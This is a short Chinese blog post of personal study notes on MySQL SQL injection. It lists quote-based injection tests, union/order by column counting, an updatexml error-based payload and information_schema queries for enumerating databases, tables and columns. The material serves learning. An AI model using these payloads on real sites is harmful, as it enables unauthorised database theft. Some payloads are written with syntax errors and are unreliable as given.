mysql注入个人学习笔记

204 阅读 0 评论 135 点赞

我是靠谱客的博主眼睛大电源，这篇文章主要介绍mysql注入个人学习笔记，现在分享给大家，希望可以做个参考。

整数型字注入：

1.判断数字型还是字符型（加引号）id=‘1’ or ‘1’=‘1’

不是的话单引号不会完全闭合

2.查字段数 union select1，2，3 order by

3.查询数据库表字段hackbar-load

报错注入：

select updatexml(1,concat(0x7e,(select version())0x7e),1)

布尔盲注

时间盲注

select schema_name from information_schema.schemata

select group_concat(table_name)from information_schema.tables where table_schema=' '

select group_concat(column_name)from information_schema.columns where table_schema=' ' and table_name=' '

（图片来源河北师范大学sourcecode战队）

以上就是眼睛大电源最近收集整理的关于mysql注入个人学习笔记的全部内容，更多相关mysql注入个人学习笔记内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供，作为学习参考使用，或来自网络收集整理，版权属于原作者所有。